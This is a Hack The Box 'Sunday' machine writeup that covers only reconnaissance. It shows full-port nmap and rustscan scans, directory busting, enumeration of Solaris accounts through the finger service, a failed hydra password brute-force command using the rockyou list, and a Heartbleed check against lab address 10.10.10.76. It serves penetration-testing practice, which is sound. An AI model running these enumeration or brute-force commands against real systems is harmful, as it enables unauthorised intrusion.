Sunday HTB Writeup

Geranard
12 min read, Sep 29, 2023

Hello everyone. Hope this finds you in good health. This time I'd like to share my writeup on solving one of HTB's retired machines, Sunday.

Sunday HTB information card

Enumeration

nmap and rustscan.

nmap
Command: nmap -A -p- -T4 -Pn -vv -oN nmap-report-tcp.txt 10.10.10.76
Result:
Nmap scan report for 10.10.10.76
Host is up, received user-set (0.30s latency).
Not shown: 65501 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
79/tcp open finger? syn-ack
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
515/tcp open printer syn-ack
3749/tcp filtered cimtrak no-response
...
4876/tcp filtered tritium-can no-response
6787/tcp open ssl/http syn-ack Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
| http-title: Solaris Dashboard
|_Requested resource was https://10.10.10.76:6787/solaris/
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Issuer: commonName=sunday/organizationName=Host Root CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-08T19:40:00
| Not valid after: 2031-12-06T19:40:00
| MD5: 6bd3:4b32:c05a:e5fe:a8c8:61f0:4361:414a
| SHA-1: a5eb:c880:968c:84aa:10b2:a944:bad2:56ca:aed5:b66a
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcqgAwIBAgIHAIqqcz45jjALBgkqhkiG9w0BAQswKDEVMBMGA1UEChMM
| SG9zdCBSb290IENBMQ8wDQYDVQQDEwZzdW5kYXkwHhcNMjExMjA4MTk0MDAwWhcN
| MzExMjA2MTk0MDAwWjARMQ8wDQYDVQQDEwZzdW5kYXkwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQC67wVPVDRPU/Sahp2QnHx2NlMUQrkyBJrr4TSjS9v6
| /DFKqf3m2XnYuKyFl9BAO8Mi+Hz3ON4nZWmigZGX6LnJpci6whB89pLZdcogruB8
| YMyGuP8y2v3orEBLQ5NrcP6fcKLMp+6PXurvuZDgPH+oXHJyp/w//pkBROQRC0oN
| 8dx7Zq2t4ZfDiqhgw1j79V7kZNOjKp8gU1HmQ/BjYEaOfVZNwuTVyqUtfcjuxIio
| JEHaVmhNV9Xp9DAOLBFuTXpsJe3anSjGGP0DWMyNOps2VrZUyJwC22U5jlcp7Rj/
| WWE5gnm6ClH44DXlKMIt8O2vq0MfqvvGeSIFbSOPb6Q3AgMBAAGjKjAoMBEGA1Ud
| EQQKMAiCBnN1bmRheTATBgNVHSUEDDAKBggrBgEFBQcDATALBgkqhkiG9w0BAQsD
| ggEBAC/f3nN6ur2oSSedYNIkf6/+MV3qu8xE+Cqt/SbSk0uSmQ7hYpMhc8Ele/gr
| Od0cweaClKXEhugRwfVW5jmjJXrnSZtOpyz09dMhZMA9RJ9efVfnrn5Qw5gUriMx
| dFMrAnOIXsFu0vnRZLJP7E95NHpZVECnRXCSPjp4iPe/vyl1OuoVLBhoOwZ8O7zw
| WlP/51SiII8LPNyeq+01mCY0mv3RJD9uAeNJawnFwsCo/Tg9/mjk0zxUMaXm80Bb
| qsSmST23vYwuPw3c/91fJI4dWb7uEZJa55hRIU0uMPOLOUpN1kKkGPO+7QCzfedc
| WPptRhU+2UMGhFXHyGV5EJp2zvc=
|_-----END CERTIFICATE-----
...
22022/tcp open ssh syn-ack OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsG4q9TS6eAOrX6zI+R0CMMkCTfS36QDqQW5NcF/v9vmNWyL6xSZ8x38AB2T+Kbx672RqYCtKmHcZMFs55Q3hoWQE7YgWOJhXw9agE3aIjXiWCNhmmq4T5+zjbJWbF4OLkHzNzZ2qGHbhQD9Kbw9AmyW8ZS+P8AGC5fO36AVvgyS8+5YbA05N3UDKBbQu/WlpgyLfuNpAq9279mfq/MUWWRNKGKICF/jRB3lr2BMD+BhDjTooM7ySxpq7K9dfOgdmgqFrjdE4bkxBrPsWLF41YQy3hV0L/MJQE2h+s7kONmmZJMl4lAZ8PNUqQe6sdkDhL1Ex2+yQlvbyqQZw3xhuJ
| 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII/0DH8qZiCfAzZNkSaAmT39TyBUFFwjdk8vm7ze+Wwm
...
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94%I=7%D=9/23%Time=650F0A2D%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x20
SF:\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x2
SF:0\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\
SF:?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHELP\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\
SF:r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x20
SF:\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x2
SF:0When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(SS
SF:LSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x20\
SF:x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20
SF:\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");

rustscan
Command: rustscan -a 10.10.10.76 -r 1-65535 --ulimit 5000 -- -A
Result:
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢

[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.76:111
Open 10.10.10.76:79
Open 10.10.10.76:515
Open 10.10.10.76:6787
Open 10.10.10.76:22022
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A" on ip 10.10.10.76
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( https://nmap.org )
...
Scanning 10.10.10.76 [5 ports]
...

PORT STATE SERVICE REASON VERSION
79/tcp open finger? syn-ack
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
|_finger: No one logged on\x0D
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
515/tcp open printer syn-ack
6787/tcp open ssl/http syn-ack Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Issuer: commonName=sunday/organizationName=Host Root CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-08T19:40:00
| Not valid after: 2031-12-06T19:40:00
| MD5: 6bd3:4b32:c05a:e5fe:a8c8:61f0:4361:414a
| SHA-1: a5eb:c880:968c:84aa:10b2:a944:bad2:56ca:aed5:b66a
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcqgAwIBAgIHAIqqcz45jjALBgkqhkiG9w0BAQswKDEVMBMGA1UEChMM
| SG9zdCBSb290IENBMQ8wDQYDVQQDEwZzdW5kYXkwHhcNMjExMjA4MTk0MDAwWhcN
| MzExMjA2MTk0MDAwWjARMQ8wDQYDVQQDEwZzdW5kYXkwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQC67wVPVDRPU/Sahp2QnHx2NlMUQrkyBJrr4TSjS9v6
| /DFKqf3m2XnYuKyFl9BAO8Mi+Hz3ON4nZWmigZGX6LnJpci6whB89pLZdcogruB8
| YMyGuP8y2v3orEBLQ5NrcP6fcKLMp+6PXurvuZDgPH+oXHJyp/w//pkBROQRC0oN
| 8dx7Zq2t4ZfDiqhgw1j79V7kZNOjKp8gU1HmQ/BjYEaOfVZNwuTVyqUtfcjuxIio
| JEHaVmhNV9Xp9DAOLBFuTXpsJe3anSjGGP0DWMyNOps2VrZUyJwC22U5jlcp7Rj/
| WWE5gnm6ClH44DXlKMIt8O2vq0MfqvvGeSIFbSOPb6Q3AgMBAAGjKjAoMBEGA1Ud
| EQQKMAiCBnN1bmRheTATBgNVHSUEDDAKBggrBgEFBQcDATALBgkqhkiG9w0BAQsD
| ggEBAC/f3nN6ur2oSSedYNIkf6/+MV3qu8xE+Cqt/SbSk0uSmQ7hYpMhc8Ele/gr
| Od0cweaClKXEhugRwfVW5jmjJXrnSZtOpyz09dMhZMA9RJ9efVfnrn5Qw5gUriMx
| dFMrAnOIXsFu0vnRZLJP7E95NHpZVECnRXCSPjp4iPe/vyl1OuoVLBhoOwZ8O7zw
| WlP/51SiII8LPNyeq+01mCY0mv3RJD9uAeNJawnFwsCo/Tg9/mjk0zxUMaXm80Bb
| qsSmST23vYwuPw3c/91fJI4dWb7uEZJa55hRIU0uMPOLOUpN1kKkGPO+7QCzfedc
| WPptRhU+2UMGhFXHyGV5EJp2zvc=
|_-----END CERTIFICATE-----
| http-title: Solaris Dashboard
|_Requested resource was https://10.10.10.76:6787/solaris/
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
22022/tcp open ssh syn-ack OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsG4q9TS6eAOrX6zI+R0CMMkCTfS36QDqQW5NcF/v9vmNWyL6xSZ8x38AB2T+Kbx672RqYCtKmHcZMFs55Q3hoWQE7YgWOJhXw9agE3aIjXiWCNhmmq4T5+zjbJWbF4OLkHzNzZ2qGHbhQD9Kbw9AmyW8ZS+P8AGC5fO36AVvgyS8+5YbA05N3UDKBbQu/WlpgyLfuNpAq9279mfq/MUWWRNKGKICF/jRB3lr2BMD+BhDjTooM7ySxpq7K9dfOgdmgqFrjdE4bkxBrPsWLF41YQy3hV0L/MJQE2h+s7kONmmZJMl4lAZ8PNUqQe6sdkDhL1Ex2+yQlvbyqQZw3xhuJ
| 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII/0DH8qZiCfAzZNkSaAmT39TyBUFFwjdk8vm7ze+Wwm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94%I=7%D=9/23%Time=650F023F%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x20
SF:\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x2
SF:0\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\
SF:?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHELP\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\
SF:r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x20
SF:\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x2
SF:0When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(SS
SF:LSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x20\
SF:x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20
SF:\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")
...

Skimming the results, port 6787 stands out: an Apache/mod_wsgi server over TLS whose page title is "Solaris Dashboard".

Content of sunday.htb on port 6787

I tried the obvious default credentials, with no result. Viewing the page source shows this is an Oracle product released around 2018.

With nothing found, I moved on to directory busting with gobuster and feroxbuster.

Gobuster
Command: gobuster dir -u https://sunday.htb:6787 -w /usr/share/wordlists/dirb/common.txt -x php -k
Result:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://sunday.htb:6787
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.hta.php (Status: 403) [Size: 217]
/.htaccess (Status: 403) [Size: 218]
/.htaccess.php (Status: 403) [Size: 222]
/.htpasswd (Status: 403) [Size: 218]
/.htpasswd.php (Status: 403) [Size: 222]
/~http (Status: 403) [Size: 214]
/~http.php (Status: 403) [Size: 218]
/~httpd.php (Status: 403) [Size: 219]
/~httpd (Status: 403) [Size: 215]
/jhtml (Status: 403) [Size: 214]
/jhtml.php (Status: 403) [Size: 218]
/phtml.php (Status: 403) [Size: 218]
/phtml (Status: 403) [Size: 214]
/rhtml (Status: 403) [Size: 214]
/rhtml.php (Status: 403) [Size: 218]
/server-status (Status: 403) [Size: 222]
/shtml (Status: 403) [Size: 214]
/shtml.php (Status: 403) [Size: 218]
/solaris (Status: 302) [Size: 216] [--> https://sunday.htb:6787/solaris/]
/xhtml (Status: 403) [Size: 214]
/xhtml.php (Status: 403) [Size: 218]
===============================================================
Finished
===============================================================

Feroxbuster
Command: feroxbuster -u https://sunday.htb:6787 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x sh,sql,csv,xlsx,php,txt -k -C 404
Result:

Gobuster returns mostly 403 (Forbidden). Feroxbuster finds /solaris/index.html, but there is nothing there except a loading animation.

/solaris/index.html

While waiting for feroxbuster to finish, I looked at the nmap result again and noticed one port that is open but whose service nmap could not identify.

Using netcat to sunday.htb port 79

The port itself is interesting. Port 79 is the well-known port for the finger service, so I looked for finger.nse under /usr/share/nmap/scripts and ran it against the port.

Command: sudo nmap -p 79 -sV -O -vv --script=finger sunday.htb
PORT STATE SERVICE REASON VERSION
79/tcp open finger? syn-ack ttl 59
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
|_finger: No one logged on\x0D
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94%I=7%D=9/26%Time=65130D9F%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x20
SF:\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x2
SF:0\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\
SF:?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHELP\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\
SF:r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x20
SF:\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x2
SF:0When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(SS
SF:LSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x20\
SF:x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20
SF:\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Oracle Solaris 10 (94%), Oracle Solaris 11 (94%), Oracle Solaris 11 or OpenIndiana (93%), Sun Solaris 11.3 (93%), OpenIndiana oi_147 - oi_148 (91%), Nexenta OS 3.0 - 3.1.2 (OpenSolaris snv_130 - snv_134f) (91%), Sun Solaris 11 (snv_151a) or OpenIndiana oi_147 (91%), Sun Solaris 11 (snv_151a) or OpenIndiana oi_147 - oi_151a (91%), Sun OpenSolaris snv_129 (91%), Sun Solaris 11 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94%E=4%D=9/26%OT=79%CT=%CU=38830%PV=Y%DS=2%DC=I%G=N%TM=65130E04%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=109%CI=I%II=I%TS=7)
OPS(O1=ST11M53CNW2%O2=ST11M53CNW2%O3=NNT11M53CNW2%O4=ST11M53CNW2%O5=ST11M53CNW2%O6=ST11M53C)
WIN(W1=FA4C%W2=FA4C%W3=FA38%W4=FA3B%W5=FA3B%W6=FFF7)
ECN(R=Y%DF=Y%T=3C%W=FB40%O=M53CNNSNW2%CC=Y%Q=)
T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=Y%DF=Y%T=3C%W=FA09%S=O%A=S+%F=AS%O=ST11M53CNW2%RD=0%Q=)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=Y%DF=N%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=Y%T=FF%CD=S)

...
Port 79: finger

Nmap's best OS guesses are Oracle Solaris 10 and Solaris 11 (94% each); the uname output later in this writeup confirms Solaris 11.4. Every probe response on port 79 is a table with the columns Login, Name, TTY, Idle, When, and Where, which is the output format of a finger daemon.

After some searching on Google, I found the HackTricks page about finger.

Using root as input

Foothold

So that is how to enumerate the finger service. Kali Linux ships a finger client that I can use for the queries.

Command: finger admin@sunday.htb
Result:
Login       Name                   TTY    Idle    When    Where
adm         Admin                                 < . . . . >
dladm       Datalink Admin                        < . . . . >
netadm      Network Admin                         < . . . . >
netcfg      Network Configuratio                  < . . . . >
dhcpserv    DHCP Configuration A                  < . . . . >
ikeuser     IKE Admin                             < . . . . >
lp          Line Printer Admin                    < . . . . >

Command: finger user@sunday.htb
Result:
Login       Name                   TTY    Idle    When    Where
aiuser      AI User                               < . . . . >
openldap    OpenLDAP User                         < . . . . >
nobody      NFS Anonymous Access                  < . . . . >
noaccess    No Access User                        < . . . . >
nobody4     SunOS 4.x NFS Anonym                  < . . . . >

After searching for more information, I found this article. So I tried hydra with a username.txt built from the logins above and rockyou as the password list, against port 515. I picked that port because it is the printer service and finger showed an "lp" account (Line Printer Admin). The default port for rlogin is 513, which nmap did not find open. In hindsight this could never work: 515/tcp is LPD, the line-printer spooler protocol (RFC 1179), while hydra's rlogin module speaks the rlogin protocol, so no credential would ever be accepted there.

Command: hydra -L username.txt -P /usr/share/wordlists/rockyou.txt rlogin://sunday.htb:515
Result:
(Spoiler) None

While enumerating, I also checked port 6787 for Heartbleed. It is not vulnerable, which the banner already tells us: Heartbleed (CVE-2014-0160) affects OpenSSL 1.0.1 through 1.0.1f (and 1.0.2-beta1), and this server runs OpenSSL 1.0.2o.

Command: nmap --script=ssl-heartbleed.nse -v -sV -p 6787 10.10.10.76
Result:
None

